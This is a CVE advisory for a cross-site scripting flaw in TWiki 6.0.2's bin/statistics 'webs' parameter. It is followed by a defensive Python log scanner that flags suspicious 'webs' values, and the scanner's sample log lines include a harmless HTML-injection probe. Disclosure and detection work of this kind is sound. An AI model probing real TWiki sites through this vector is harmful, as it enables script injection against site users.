# bin/statistics in TWiki 6.0.2 allows XSS via the webs parameter (CVE-2018-20212)

## Vulnerability Type

Cross Site Scripting (XSS)

## Vendor of Product

twiki

## Affected Product Version

twiki - 6.0.2

## Affected Component

twiki/bin/statistics

## Attack Type

Remote

## Attack Vectors

`/twiki/bin/statistics?webs=`

## Credit

This vulnerability was discovered by Jiawang Zhang, Coordination Center of China (CNCERT/CC)

## Product Download

http://twiki.org/cgi-bin/view/Codev/DownloadTWiki

## References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20212
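
For defenders checking whether the affected endpoint has been probed, the following Python scans web-server access logs for requests to `bin/statistics` whose `webs` value is not a plain list of web names. It is an added example, not part of the original advisory or of TWiki's code; the allow-list pattern, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `webs` value is a comma-separated list of web names
# built from letters, digits, underscores, and "/" or "." for sub-webs.
SAFE_WEBS = re.compile(r"[A-Za-z0-9_./]+(?:,[A-Za-z0-9_./]+)*")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_webs(log_line):
    """Return the decoded `webs` values in this request that fail the allow-list."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # Match /bin/statistics with or without a trailing path component.
    if not re.search(r"/bin/statistics(?:/|$)", url.path):
        return []
    # parse_qs percent-decodes once; keep_blank_values so "webs=" is still parsed.
    values = parse_qs(url.query, keep_blank_values=True).get("webs", [])
    return [v for v in values if v and not SAFE_WEBS.fullmatch(v)]

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2019:10:00:01 +0000] "GET /twiki/bin/statistics?webs=Main,TWiki HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Jan/2019:10:00:05 +0000] "GET /twiki/bin/statistics?webs=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5342',
    '198.51.100.9 - - [10/Jan/2019:10:00:09 +0000] "GET /twiki/bin/view/Main/WebHome?webs=%3Cb%3E HTTP/1.1" 200 900',
    '198.51.100.4 - - [10/Jan/2019:10:00:12 +0000] "GET /twiki/bin/statistics?webs= HTTP/1.1" 200 5000',
]

def scan(lines):
    """Return (line_number, offending_values) for each flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        bad = suspicious_webs(line)
        if bad:
            hits.append((n, bad))
    return hits

if __name__ == "__main__":
    for n, bad in scan(SAMPLE_LOG):
        print(f"line {n}: unexpected webs value(s): {bad}")
```

Only the query string of logged requests is inspected, so values sent in a POST body or encoded more than once need separate handling.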